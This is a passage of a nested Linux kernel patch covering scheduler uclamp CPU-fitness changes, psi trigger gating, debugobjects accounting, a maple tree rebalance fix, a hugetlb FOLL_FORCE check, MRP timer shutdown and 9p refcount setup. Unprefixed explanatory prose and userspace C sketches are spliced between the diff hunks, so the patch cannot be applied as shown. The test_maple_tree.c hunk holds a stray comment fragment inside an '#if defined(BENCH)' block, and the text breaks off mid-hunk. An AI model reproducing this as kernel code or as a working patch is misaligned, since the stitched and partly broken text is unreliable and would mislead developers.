++	 *   |      ___        |   |      |   |      (region b, uclamp_min <= util <= uclamp_max)
++	 *   |_ _ _|_ _|_ _ _ _| _ | _ _ _| _ | _ _ _ _ _ uclamp_min
++	 *   |     |   |       |   |      |   |
++	 *   |     |   |       |   |      |   |      (region c, boosted, util < uclamp_min)
++	 *   +----------------------------------------
++	 *         cpu0        cpu1       cpu2
++	 *
++	 * a) If util > uclamp_max, then we're capped, we don't care about
++	 *    actual fitness value here. We only care if uclamp_max fits
++	 *    capacity without taking margin/pressure into account.
++	 *    See comment above.
++	 *
++	 * b) If uclamp_min <= util <= uclamp_max, then the normal
++	 *    fits_capacity() rules apply. Except we need to ensure that we
++	 *    remain within uclamp_max; see the comment above.
++	 *
++	 * c) If util < uclamp_min, then we are boosted. Same as (b) but we
++	 *    need to ensure that the boosted value fits the CPU without
++	 *    taking margin/pressure into account.
++	 *
++	 * Cases (a) and (b) are handled in the 'fits' variable already. We
++	 * just need to consider an extra check for case (c) after ensuring we
++	 * handle the case uclamp_min > uclamp_max.
++	 */
++	uclamp_min = min(uclamp_min, uclamp_max);
++	if (util < uclamp_min && capacity_orig != SCHED_CAPACITY_SCALE)
++		fits = fits && (uclamp_min <= capacity_orig_thermal);
++
++	return fits;
++}
++
++static inline int task_fits_cpu(struct task_struct *p, int cpu)
++{
++	unsigned long uclamp_min = uclamp_eff_value(p, UCLAMP_MIN);
++	unsigned long uclamp_max = uclamp_eff_value(p, UCLAMP_MAX);
++	unsigned long util = task_util_est(p);
++	return util_fits_cpu(util, uclamp_min, uclamp_max, cpu);
+ }
+ 
+ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
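The two diagrams above compress into a short decision procedure. Here is a
userspace sketch of util_fits_cpu()'s rules, reproducing the kernel's ~80%
fitness margin; all capacities and the test values are illustrative:

#include <stdbool.h>
#include <stdio.h>

#define SCHED_CAPACITY_SCALE 1024UL

static bool fits_capacity(unsigned long util, unsigned long cap)
{
	return util * 1280 < cap * 1024;   /* ~80% headroom rule */
}

static bool util_fits_cpu_sketch(unsigned long util,
				 unsigned long uclamp_min,
				 unsigned long uclamp_max,
				 unsigned long cap_orig,
				 unsigned long cap_thermal)
{
	bool fits = fits_capacity(util, cap_orig);
	bool max_fits;

	/* Force-fit via uclamp_max, except on a max-capacity CPU where
	 * that would mask a genuinely saturated system. */
	max_fits = (cap_orig == SCHED_CAPACITY_SCALE) &&
		   (uclamp_max == SCHED_CAPACITY_SCALE);
	max_fits = !max_fits && (uclamp_max <= cap_orig);
	fits = fits || max_fits;

	/* Region (c): a boosted task must get uclamp_min capacity,
	 * honouring thermal pressure. */
	uclamp_min = uclamp_min < uclamp_max ? uclamp_min : uclamp_max;
	if (util < uclamp_min && cap_orig != SCHED_CAPACITY_SCALE)
		fits = fits && (uclamp_min <= cap_thermal);

	return fits;
}

int main(void)
{
	/* util 450 overshoots a 512-capacity CPU on its own, but a cap
	 * of 256 forces it to fit there anyway. */
	printf("%d\n", util_fits_cpu_sketch(450, 0, 256, 512, 512));
	return 0;
}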
+@@ -4442,7 +4569,7 @@ static inline void update_misfit_status(struct task_struct *p, struct rq *rq)
+ 		return;
+ 	}
+ 
+-	if (task_fits_capacity(p, capacity_of(cpu_of(rq)))) {
++	if (task_fits_cpu(p, cpu_of(rq))) {
+ 		rq->misfit_task_load = 0;
+ 		return;
+ 	}
+@@ -5862,7 +5989,10 @@ static inline void hrtick_update(struct rq *rq)
+ #ifdef CONFIG_SMP
+ static inline bool cpu_overutilized(int cpu)
+ {
+-	return !fits_capacity(cpu_util_cfs(cpu), capacity_of(cpu));
++	unsigned long rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
++	unsigned long rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
++
++	return !util_fits_cpu(cpu_util_cfs(cpu), rq_util_min, rq_util_max, cpu);
+ }
+ 
+ static inline void update_overutilized_status(struct rq *rq)
+@@ -6654,21 +6784,23 @@ static int select_idle_cpu(struct task_struct *p, struct sched_domain *sd, bool
+ static int
+ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ {
+-	unsigned long task_util, best_cap = 0;
++	unsigned long task_util, util_min, util_max, best_cap = 0;
+ 	int cpu, best_cpu = -1;
+ 	struct cpumask *cpus;
+ 
+ 	cpus = this_cpu_cpumask_var_ptr(select_rq_mask);
+ 	cpumask_and(cpus, sched_domain_span(sd), p->cpus_ptr);
+ 
+-	task_util = uclamp_task_util(p);
++	task_util = task_util_est(p);
++	util_min = uclamp_eff_value(p, UCLAMP_MIN);
++	util_max = uclamp_eff_value(p, UCLAMP_MAX);
+ 
+ 	for_each_cpu_wrap(cpu, cpus, target) {
+ 		unsigned long cpu_cap = capacity_of(cpu);
+ 
+ 		if (!available_idle_cpu(cpu) && !sched_idle_cpu(cpu))
+ 			continue;
+-		if (fits_capacity(task_util, cpu_cap))
++		if (util_fits_cpu(task_util, util_min, util_max, cpu))
+ 			return cpu;
+ 
+ 		if (cpu_cap > best_cap) {
+@@ -6680,10 +6812,13 @@ select_idle_capacity(struct task_struct *p, struct sched_domain *sd, int target)
+ 	return best_cpu;
+ }
+ 
+-static inline bool asym_fits_capacity(unsigned long task_util, int cpu)
++static inline bool asym_fits_cpu(unsigned long util,
++				 unsigned long util_min,
++				 unsigned long util_max,
++				 int cpu)
+ {
+ 	if (sched_asym_cpucap_active())
+-		return fits_capacity(task_util, capacity_of(cpu));
++		return util_fits_cpu(util, util_min, util_max, cpu);
+ 
+ 	return true;
+ }
+@@ -6695,7 +6830,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ {
+ 	bool has_idle_core = false;
+ 	struct sched_domain *sd;
+-	unsigned long task_util;
++	unsigned long task_util, util_min, util_max;
+ 	int i, recent_used_cpu;
+ 
+ 	/*
+@@ -6704,7 +6839,9 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	 */
+ 	if (sched_asym_cpucap_active()) {
+ 		sync_entity_load_avg(&p->se);
+-		task_util = uclamp_task_util(p);
++		task_util = task_util_est(p);
++		util_min = uclamp_eff_value(p, UCLAMP_MIN);
++		util_max = uclamp_eff_value(p, UCLAMP_MAX);
+ 	}
+ 
+ 	/*
+@@ -6713,7 +6850,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	lockdep_assert_irqs_disabled();
+ 
+ 	if ((available_idle_cpu(target) || sched_idle_cpu(target)) &&
+-	    asym_fits_capacity(task_util, target))
++	    asym_fits_cpu(task_util, util_min, util_max, target))
+ 		return target;
+ 
+ 	/*
+@@ -6721,7 +6858,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	 */
+ 	if (prev != target && cpus_share_cache(prev, target) &&
+ 	    (available_idle_cpu(prev) || sched_idle_cpu(prev)) &&
+-	    asym_fits_capacity(task_util, prev))
++	    asym_fits_cpu(task_util, util_min, util_max, prev))
+ 		return prev;
+ 
+ 	/*
+@@ -6736,7 +6873,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	    in_task() &&
+ 	    prev == smp_processor_id() &&
+ 	    this_rq()->nr_running <= 1 &&
+-	    asym_fits_capacity(task_util, prev)) {
++	    asym_fits_cpu(task_util, util_min, util_max, prev)) {
+ 		return prev;
+ 	}
+ 
+@@ -6748,7 +6885,7 @@ static int select_idle_sibling(struct task_struct *p, int prev, int target)
+ 	    cpus_share_cache(recent_used_cpu, target) &&
+ 	    (available_idle_cpu(recent_used_cpu) || sched_idle_cpu(recent_used_cpu)) &&
+ 	    cpumask_test_cpu(p->recent_used_cpu, p->cpus_ptr) &&
+-	    asym_fits_capacity(task_util, recent_used_cpu)) {
++	    asym_fits_cpu(task_util, util_min, util_max, recent_used_cpu)) {
+ 		return recent_used_cpu;
+ 	}
+ 
+@@ -7044,6 +7181,8 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ {
+ 	struct cpumask *cpus = this_cpu_cpumask_var_ptr(select_rq_mask);
+ 	unsigned long prev_delta = ULONG_MAX, best_delta = ULONG_MAX;
++	unsigned long p_util_min = uclamp_is_used() ? uclamp_eff_value(p, UCLAMP_MIN) : 0;
++	unsigned long p_util_max = uclamp_is_used() ? uclamp_eff_value(p, UCLAMP_MAX) : 1024;
+ 	struct root_domain *rd = this_rq()->rd;
+ 	int cpu, best_energy_cpu, target = -1;
+ 	struct sched_domain *sd;
+@@ -7068,7 +7207,7 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	target = prev_cpu;
+ 
+ 	sync_entity_load_avg(&p->se);
+-	if (!task_util_est(p))
++	if (!uclamp_task_util(p, p_util_min, p_util_max))
+ 		goto unlock;
+ 
+ 	eenv_task_busy_time(&eenv, p, prev_cpu);
+@@ -7076,6 +7215,8 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 	for (; pd; pd = pd->next) {
+ 		unsigned long cpu_cap, cpu_thermal_cap, util;
+ 		unsigned long cur_delta, max_spare_cap = 0;
++		unsigned long rq_util_min, rq_util_max;
++		unsigned long util_min, util_max;
+ 		bool compute_prev_delta = false;
+ 		int max_spare_cap_cpu = -1;
+ 		unsigned long base_energy;
+@@ -7112,8 +7253,26 @@ static int find_energy_efficient_cpu(struct task_struct *p, int prev_cpu)
+ 			 * much capacity we can get out of the CPU; this is
+ 			 * aligned with sched_cpu_util().
+ 			 */
+-			util = uclamp_rq_util_with(cpu_rq(cpu), util, p);
+-			if (!fits_capacity(util, cpu_cap))
++			if (uclamp_is_used()) {
++				if (uclamp_rq_is_idle(cpu_rq(cpu))) {
++					util_min = p_util_min;
++					util_max = p_util_max;
++				} else {
++					/*
++					 * Open code uclamp_rq_util_with() except for
++					 * the clamp() part, i.e. apply max aggregation
++					 * only. util_fits_cpu() logic requires operating
++					 * on the non-clamped util but must use the
++					 * max-aggregated uclamp_{min, max}.
++					 */
++					rq_util_min = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MIN);
++					rq_util_max = uclamp_rq_get(cpu_rq(cpu), UCLAMP_MAX);
++
++					util_min = max(rq_util_min, p_util_min);
++					util_max = max(rq_util_max, p_util_max);
++				}
++			}
++			if (!util_fits_cpu(util, util_min, util_max, cpu))
+ 				continue;
+ 
+ 			lsub_positive(&cpu_cap, util);
+@@ -8276,7 +8435,7 @@ static int detach_tasks(struct lb_env *env)
+ 
+ 		case migrate_misfit:
+ 			/* This is not a misfit task */
+-			if (task_fits_capacity(p, capacity_of(env->src_cpu)))
++			if (task_fits_cpu(p, env->src_cpu))
+ 				goto next;
+ 
+ 			env->imbalance = 0;
+@@ -9281,6 +9440,10 @@ static inline void update_sg_wakeup_stats(struct sched_domain *sd,
+ 
+ 	memset(sgs, 0, sizeof(*sgs));
+ 
++	/* Assume that task can't fit any CPU of the group */
++	if (sd->flags & SD_ASYM_CPUCAPACITY)
++		sgs->group_misfit_task_load = 1;
++
+ 	for_each_cpu(i, sched_group_span(group)) {
+ 		struct rq *rq = cpu_rq(i);
+ 		unsigned int local;
+@@ -9300,12 +9463,12 @@ static inline void update_sg_wakeup_stats(struct sched_domain *sd,
+ 		if (!nr_running && idle_cpu_without(i, p))
+ 			sgs->idle_cpus++;
+ 
+-	}
++		/* Check if task fits in the CPU */
++		if (sd->flags & SD_ASYM_CPUCAPACITY &&
++		    sgs->group_misfit_task_load &&
++		    task_fits_cpu(p, i))
++			sgs->group_misfit_task_load = 0;
+ 
+-	/* Check if task fits in the group */
+-	if (sd->flags & SD_ASYM_CPUCAPACITY &&
+-	    !task_fits_capacity(p, group->sgc->max_capacity)) {
+-		sgs->group_misfit_task_load = 1;
+ 	}
+ 
+ 	sgs->group_capacity = group->sgc->capacity;
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index ee2ecc081422e..7f40d87e8f509 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -539,10 +539,12 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 
+ 			/* Calculate growth since last update */
+ 			growth = window_update(&t->win, now, total[t->state]);
+-			if (growth < t->threshold)
+-				continue;
++			if (!t->pending_event) {
++				if (growth < t->threshold)
++					continue;
+ 
+-			t->pending_event = true;
++				t->pending_event = true;
++			}
+ 		}
+ 		/* Limit event signaling to once per window */
+ 		if (now < t->last_event_time + t->win.size)
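The restructured branch matters because an armed trigger must survive windows
in which growth dips back under the threshold before the window elapses. A
minimal sketch of the resulting once-per-window gate, with psi's types reduced
to plain integers (illustrative, not the kernel structures):

#include <stdbool.h>

struct trig {
	unsigned long long last_event_time, win_size, threshold;
	bool pending_event;
};

static bool maybe_fire(struct trig *t, unsigned long long now,
		       unsigned long long growth)
{
	if (!t->pending_event) {
		if (growth < t->threshold)
			return false;     /* nothing armed, nothing due */
		t->pending_event = true;  /* arm; stays armed until fired */
	}
	if (now < t->last_event_time + t->win_size)
		return false;             /* at most one event per window */
	t->last_event_time = now;
	t->pending_event = false;
	return true;
}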
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586e..d6d488e8eb554 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -2979,6 +2979,23 @@ static inline unsigned long cpu_util_rt(struct rq *rq)
+ #ifdef CONFIG_UCLAMP_TASK
+ unsigned long uclamp_eff_value(struct task_struct *p, enum uclamp_id clamp_id);
+ 
++static inline unsigned long uclamp_rq_get(struct rq *rq,
++					  enum uclamp_id clamp_id)
++{
++	return READ_ONCE(rq->uclamp[clamp_id].value);
++}
++
++static inline void uclamp_rq_set(struct rq *rq, enum uclamp_id clamp_id,
++				 unsigned int value)
++{
++	WRITE_ONCE(rq->uclamp[clamp_id].value, value);
++}
++
++static inline bool uclamp_rq_is_idle(struct rq *rq)
++{
++	return rq->uclamp_flags & UCLAMP_FLAG_IDLE;
++}
++
+ /**
+  * uclamp_rq_util_with - clamp @util with @rq and @p effective uclamp values.
+  * @rq:		The rq to clamp against. Must not be NULL.
+@@ -3014,12 +3031,12 @@ unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
+ 		 * Ignore last runnable task's max clamp, as this task will
+ 		 * reset it. Similarly, no need to read the rq's min clamp.
+ 		 */
+-		if (rq->uclamp_flags & UCLAMP_FLAG_IDLE)
++		if (uclamp_rq_is_idle(rq))
+ 			goto out;
+ 	}
+ 
+-	min_util = max_t(unsigned long, min_util, READ_ONCE(rq->uclamp[UCLAMP_MIN].value));
+-	max_util = max_t(unsigned long, max_util, READ_ONCE(rq->uclamp[UCLAMP_MAX].value));
++	min_util = max_t(unsigned long, min_util, uclamp_rq_get(rq, UCLAMP_MIN));
++	max_util = max_t(unsigned long, max_util, uclamp_rq_get(rq, UCLAMP_MAX));
+ out:
+ 	/*
+ 	 * Since CPU's {min,max}_util clamps are MAX aggregated considering
+@@ -3060,6 +3077,15 @@ static inline bool uclamp_is_used(void)
+ 	return static_branch_likely(&sched_uclamp_used);
+ }
+ #else /* CONFIG_UCLAMP_TASK */
++static inline unsigned long uclamp_eff_value(struct task_struct *p,
++					     enum uclamp_id clamp_id)
++{
++	if (clamp_id == UCLAMP_MIN)
++		return 0;
++
++	return SCHED_CAPACITY_SCALE;
++}
++
+ static inline
+ unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
+ 				  struct task_struct *p)
+@@ -3073,6 +3099,25 @@ static inline bool uclamp_is_used(void)
+ {
+ 	return false;
+ }
++
++static inline unsigned long uclamp_rq_get(struct rq *rq,
++					  enum uclamp_id clamp_id)
++{
++	if (clamp_id == UCLAMP_MIN)
++		return 0;
++
++	return SCHED_CAPACITY_SCALE;
++}
++
++static inline void uclamp_rq_set(struct rq *rq, enum uclamp_id clamp_id,
++				 unsigned int value)
++{
++}
++
++static inline bool uclamp_rq_is_idle(struct rq *rq)
++{
++	return false;
++}
+ #endif /* CONFIG_UCLAMP_TASK */
+ 
+ #ifdef CONFIG_HAVE_SCHED_AVG_IRQ
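The new accessors centralize the READ_ONCE()/WRITE_ONCE() pairing, and the
!CONFIG_UCLAMP_TASK stubs return the identity clamp [0, SCHED_CAPACITY_SCALE].
A compact sketch of the max-aggregation they feed in uclamp_rq_util_with(),
with the kernel helpers replaced by plain C (illustrative only):

static inline unsigned long max_ul(unsigned long a, unsigned long b)
{
	return a > b ? a : b;
}

/* Combine task and rq clamps by max aggregation, then clamp the
 * utilization. min > max is a tolerated corner case. */
static unsigned long clamp_util(unsigned long util,
				unsigned long p_min, unsigned long p_max,
				unsigned long rq_min, unsigned long rq_max)
{
	unsigned long min_util = max_ul(p_min, rq_min);
	unsigned long max_util = max_ul(p_max, rq_max);

	if (min_util > max_util)
		return min_util;
	return util < min_util ? min_util :
	       util > max_util ? max_util : util;
}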
+diff --git a/kernel/trace/blktrace.c b/kernel/trace/blktrace.c
+index a995ea1ef849a..a66cff5a18579 100644
+--- a/kernel/trace/blktrace.c
++++ b/kernel/trace/blktrace.c
+@@ -1548,7 +1548,8 @@ blk_trace_event_print_binary(struct trace_iterator *iter, int flags,
+ 
+ static enum print_line_t blk_tracer_print_line(struct trace_iterator *iter)
+ {
+-	if (!(blk_tracer_flags.val & TRACE_BLK_OPT_CLASSIC))
++	if ((iter->ent->type != TRACE_BLK) ||
++	    !(blk_tracer_flags.val & TRACE_BLK_OPT_CLASSIC))
+ 		return TRACE_TYPE_UNHANDLED;
+ 
+ 	return print_one_line(iter, true);
+diff --git a/kernel/trace/trace_events_hist.c b/kernel/trace/trace_events_hist.c
+index 1c82478e8dffe..b6e5724a9ea35 100644
+--- a/kernel/trace/trace_events_hist.c
++++ b/kernel/trace/trace_events_hist.c
+@@ -6438,7 +6438,7 @@ enable:
+ 	if (se)
+ 		se->ref++;
+  out:
+-	if (ret == 0)
++	if (ret == 0 && glob[0])
+ 		hist_err_clear();
+ 
+ 	return ret;
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 539b08ae70207..9cb53182bb31c 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1359,6 +1359,7 @@ put_user_lock:
+ put_user:
+ 	user_event_destroy_fields(user);
+ 	user_event_destroy_validators(user);
++	kfree(user->call.print_fmt);
+ 	kfree(user);
+ 	return ret;
+ }
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index 337d797a71416..6f8e5dd1dcd0c 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -437,6 +437,7 @@ static int object_cpu_offline(unsigned int cpu)
+ 	struct debug_percpu_free *percpu_pool;
+ 	struct hlist_node *tmp;
+ 	struct debug_obj *obj;
++	unsigned long flags;
+ 
+ 	/* Remote access is safe as the CPU is dead already */
+ 	percpu_pool = per_cpu_ptr(&percpu_obj_pool, cpu);
+@@ -444,6 +445,12 @@ static int object_cpu_offline(unsigned int cpu)
+ 		hlist_del(&obj->node);
+ 		kmem_cache_free(obj_cache, obj);
+ 	}
++
++	raw_spin_lock_irqsave(&pool_lock, flags);
++	obj_pool_used -= percpu_pool->obj_free;
++	debug_objects_freed += percpu_pool->obj_free;
++	raw_spin_unlock_irqrestore(&pool_lock, flags);
++
+ 	percpu_pool->obj_free = 0;
+ 
+ 	return 0;
+@@ -1318,6 +1325,8 @@ static int __init debug_objects_replace_static_objects(void)
+ 		hlist_add_head(&obj->node, &objects);
+ 	}
+ 
++	debug_objects_allocated += i;
++
+ 	/*
+ 	 * debug_objects_mem_init() is now called early that only one CPU is up
+ 	 * and interrupts have been disabled, so it is safe to replace the
+@@ -1386,6 +1395,7 @@ void __init debug_objects_mem_init(void)
+ 		debug_objects_enabled = 0;
+ 		kmem_cache_destroy(obj_cache);
+ 		pr_warn("out of memory.\n");
++		return;
+ 	} else
+ 		debug_objects_selftest();
+ 
+diff --git a/lib/fonts/fonts.c b/lib/fonts/fonts.c
+index 5f4b07b56cd9c..9738664386088 100644
+--- a/lib/fonts/fonts.c
++++ b/lib/fonts/fonts.c
+@@ -135,8 +135,8 @@ const struct font_desc *get_default_font(int xres, int yres, u32 font_w,
+ 		if (res > 20)
+ 			c += 20 - res;
+ 
+-		if ((font_w & (1 << (f->width - 1))) &&
+-		    (font_h & (1 << (f->height - 1))))
++		if ((font_w & (1U << (f->width - 1))) &&
++		    (font_h & (1U << (f->height - 1))))
+ 			c += 1000;
+ 
+ 		if (c > cc) {
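The 1U suffix is needed because f->width can be 32, making the shift count 31:
shifting a signed int into the sign bit is undefined behaviour, while the
unsigned shift is well defined. A minimal standalone illustration:

#include <stdio.h>

int main(void)
{
	unsigned int width  = 32;           /* widest supported glyph */
	unsigned int font_w = 1U << 31;     /* request for 32px width */

	/* 1 << (width - 1) would be UB here; 1U << 31 is defined. */
	if (font_w & (1U << (width - 1)))
		printf("32px width preferred\n");
	return 0;
}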
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index df352f6ccc240..fe21bf276d91c 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -2989,7 +2989,9 @@ static int mas_spanning_rebalance(struct ma_state *mas,
+ 	mast->free = &free;
+ 	mast->destroy = &destroy;
+ 	l_mas.node = r_mas.node = m_mas.node = MAS_NONE;
+-	if (!(mast->orig_l->min && mast->orig_r->max == ULONG_MAX) &&
++
++	/* Check if this is not root and has sufficient data.  */
++	if (((mast->orig_l->min != 0) || (mast->orig_r->max != ULONG_MAX)) &&
+ 	    unlikely(mast->bn->b_end <= mt_min_slots[mast->bn->type]))
+ 		mast_spanning_rebalance(mast);
+ 
+diff --git a/lib/notifier-error-inject.c b/lib/notifier-error-inject.c
+index 21016b32d3131..2b24ea6c94979 100644
+--- a/lib/notifier-error-inject.c
++++ b/lib/notifier-error-inject.c
+@@ -15,7 +15,7 @@ static int debugfs_errno_get(void *data, u64 *val)
+ 	return 0;
+ }
+ 
+-DEFINE_SIMPLE_ATTRIBUTE(fops_errno, debugfs_errno_get, debugfs_errno_set,
++DEFINE_SIMPLE_ATTRIBUTE_SIGNED(fops_errno, debugfs_errno_get, debugfs_errno_set,
+ 			"%lld\n");
+ 
+ static struct dentry *debugfs_create_errno(const char *name, umode_t mode,
+diff --git a/lib/test_firmware.c b/lib/test_firmware.c
+index c82b65947ce68..1c5a2adb16ef5 100644
+--- a/lib/test_firmware.c
++++ b/lib/test_firmware.c
+@@ -1491,6 +1491,7 @@ static int __init test_firmware_init(void)
+ 
+ 	rc = misc_register(&test_fw_misc_device);
+ 	if (rc) {
++		__test_firmware_config_free();
+ 		kfree(test_fw_config);
+ 		pr_err("could not register misc device: %d\n", rc);
+ 		return rc;
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index f425f169ef089..497fc93ccf9ec 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2498,6 +2498,25 @@ static noinline void check_dup(struct maple_tree *mt)
+ 	}
+ }
+ 
++static noinline void check_bnode_min_spanning(struct maple_tree *mt)
++{
++	int i = 50;
++	MA_STATE(mas, mt, 0, 0);
++
++	mt_set_non_kernel(9999);
++	mas_lock(&mas);
++	do {
++		mas_set_range(&mas, i*10, i*10+9);
++		mas_store(&mas, check_bnode_min_spanning);
++	} while (i--);
++
++	mas_set_range(&mas, 240, 509);
++	mas_store(&mas, NULL);
++	mas_unlock(&mas);
++	mas_destroy(&mas);
++	mt_set_non_kernel(0);
++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2742,6 +2761,10 @@ static int maple_tree_seed(void)
+ 	check_dup(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_bnode_min_spanning(&tree);
++	mtree_destroy(&tree);
++
+ #if defined(BENCH)
+ 	 * as initialization. (0 could trigger a spurious ring error warning).
+ #endif
+diff --git a/mm/gup.c b/mm/gup.c
+index 3b7bc2c1fd44c..eb8d7baf9e4d3 100644
+--- a/mm/gup.c
++++ b/mm/gup.c
+@@ -1065,6 +1065,9 @@ static int check_vma_flags(struct vm_area_struct *vma, unsigned long gup_flags)
+ 		if (!(vm_flags & VM_WRITE)) {
+ 			if (!(gup_flags & FOLL_FORCE))
+ 				return -EFAULT;
++			/* hugetlb does not support FOLL_FORCE|FOLL_WRITE. */
++			if (is_vm_hugetlb_page(vma))
++				return -EFAULT;
+ 			/*
+ 			 * We used to let the write,force case do COW in a
+ 			 * VM_MAYWRITE VM_SHARED !VM_WRITE vma, so ptrace could
+diff --git a/net/802/mrp.c b/net/802/mrp.c
+index 155f74d8b14f4..6c927d4b35f06 100644
+--- a/net/802/mrp.c
++++ b/net/802/mrp.c
+@@ -606,7 +606,10 @@ static void mrp_join_timer(struct timer_list *t)
+ 	spin_unlock(&app->lock);
+ 
+ 	mrp_queue_xmit(app);
+-	mrp_join_timer_arm(app);
++	spin_lock(&app->lock);
++	if (likely(app->active))
++		mrp_join_timer_arm(app);
++	spin_unlock(&app->lock);
+ }
+ 
+ static void mrp_periodic_timer_arm(struct mrp_applicant *app)
+@@ -620,11 +623,12 @@ static void mrp_periodic_timer(struct timer_list *t)
+ 	struct mrp_applicant *app = from_timer(app, t, periodic_timer);
+ 
+ 	spin_lock(&app->lock);
+-	mrp_mad_event(app, MRP_EVENT_PERIODIC);
+-	mrp_pdu_queue(app);
++	if (likely(app->active)) {
++		mrp_mad_event(app, MRP_EVENT_PERIODIC);
++		mrp_pdu_queue(app);
++		mrp_periodic_timer_arm(app);
++	}
+ 	spin_unlock(&app->lock);
+-
+-	mrp_periodic_timer_arm(app);
+ }
+ 
+ static int mrp_pdu_parse_end_mark(struct sk_buff *skb, int *offset)
+@@ -872,6 +876,7 @@ int mrp_init_applicant(struct net_device *dev, struct mrp_application *appl)
+ 	app->dev = dev;
+ 	app->app = appl;
+ 	app->mad = RB_ROOT;
++	app->active = true;
+ 	spin_lock_init(&app->lock);
+ 	skb_queue_head_init(&app->queue);
+ 	rcu_assign_pointer(dev->mrp_port->applicants[appl->type], app);
+@@ -900,6 +905,9 @@ void mrp_uninit_applicant(struct net_device *dev, struct mrp_application *appl)
+ 
+ 	RCU_INIT_POINTER(port->applicants[appl->type], NULL);
+ 
++	spin_lock_bh(&app->lock);
++	app->active = false;
++	spin_unlock_bh(&app->lock);
+ 	/* Delete timer and generate a final TX event to flush out
+ 	 * all pending messages before the applicant is gone.
+ 	 */
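Both timer handlers now consult app->active under app->lock before re-arming,
and teardown clears the flag under the same lock, so no timer can re-queue
itself after mrp_uninit_applicant() has started. A generic sketch of this
shutdown pattern using pthreads; the timer itself is a stand-in flag, not the
kernel API:

#include <pthread.h>
#include <stdbool.h>

struct applicant {
	pthread_mutex_t lock;
	bool active;
	bool timer_armed;       /* stand-in for a real timer */
};

static void rearm_timer(struct applicant *app) { app->timer_armed = true; }

static void timer_fn(struct applicant *app)
{
	pthread_mutex_lock(&app->lock);
	if (app->active)
		rearm_timer(app);   /* never re-arms once active is false */
	pthread_mutex_unlock(&app->lock);
}

static void teardown(struct applicant *app)
{
	pthread_mutex_lock(&app->lock);
	app->active = false;        /* in-flight handlers observe this */
	pthread_mutex_unlock(&app->lock);
	app->timer_armed = false;   /* stand-in for del_timer_sync() */
}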
+diff --git a/net/9p/client.c b/net/9p/client.c
+index aaa37b07e30a5..b554f8357f967 100644
+--- a/net/9p/client.c
++++ b/net/9p/client.c
+@@ -297,6 +297,11 @@ p9_tag_alloc(struct p9_client *c, int8_t type, uint t_size, uint r_size,
+ 	p9pdu_reset(&req->rc);
+ 	req->t_err = 0;
+ 	req->status = REQ_STATUS_ALLOC;
++	/* refcount needs to be set to 0 before inserting into the idr
++	 * so p9_tag_lookup does not accept a request that is not fully
++	 * initialized. refcount_set to 2 below will mark the request ready.
++	 */
++	refcount_set(&req->refcount, 0);
+ 	init_waitqueue_head(&req->wq);
+ 	INIT_LIST_HEAD(&req->req_list);
+ 
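The zero refcount works because lookups take their reference with a
not-zero increment, which fails until the final set publishes the request. A
self-contained sketch of that handshake; the refcount stand-ins below use C11
atomics and everything else is illustrative:

#include <stdatomic.h>
#include <stddef.h>

typedef atomic_int refcount_t;

static void refcount_set(refcount_t *r, int v) { atomic_store(r, v); }

static int refcount_inc_not_zero(refcount_t *r)
{
	int old = atomic_load(r);
	while (old != 0)
		if (atomic_compare_exchange_weak(r, &old, old + 1))
			return 1;
	return 0;                          /* still zero: not ready */
}

struct req { refcount_t refcount; /* other fields set before ready */ };

static struct req *lookup(struct req *req)
{
	return refcount_inc_not_zero(&req->refcount) ? req : NULL;
}

static void publish(struct req *req)
{
	refcount_set(&req->refcount, 0);   /* inserted but invisible */
	/* ... insert into lookup structure, finish initialization ... */
	refcount_set(&req->refcount, 2);   /* one ref for the caller,
					    * one for the response */
}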
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index a6c12863a2532..8aab2e882958c 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1881,7 +1881,7 @@ static int hci_create_cis_sync(struct hci_dev *hdev, void *data)
+ 			continue;
+ 
+ 		/* Check if all CIS(s) belonging to a CIG are ready */
+-		if (conn->link->state != BT_CONNECTED ||
++		if (!conn->link || conn->link->state != BT_CONNECTED ||
+ 		    conn->state != BT_CONNECT) {
+ 			cmd.cp.num_cis = 0;
+ 			break;
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index d97fac4f71303..b65c3aabcd536 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2660,7 +2660,7 @@ int hci_register_dev(struct hci_dev *hdev)
+ 
+ 	error = hci_register_suspend_notifier(hdev);
+ 	if (error)
+-		goto err_wqueue;
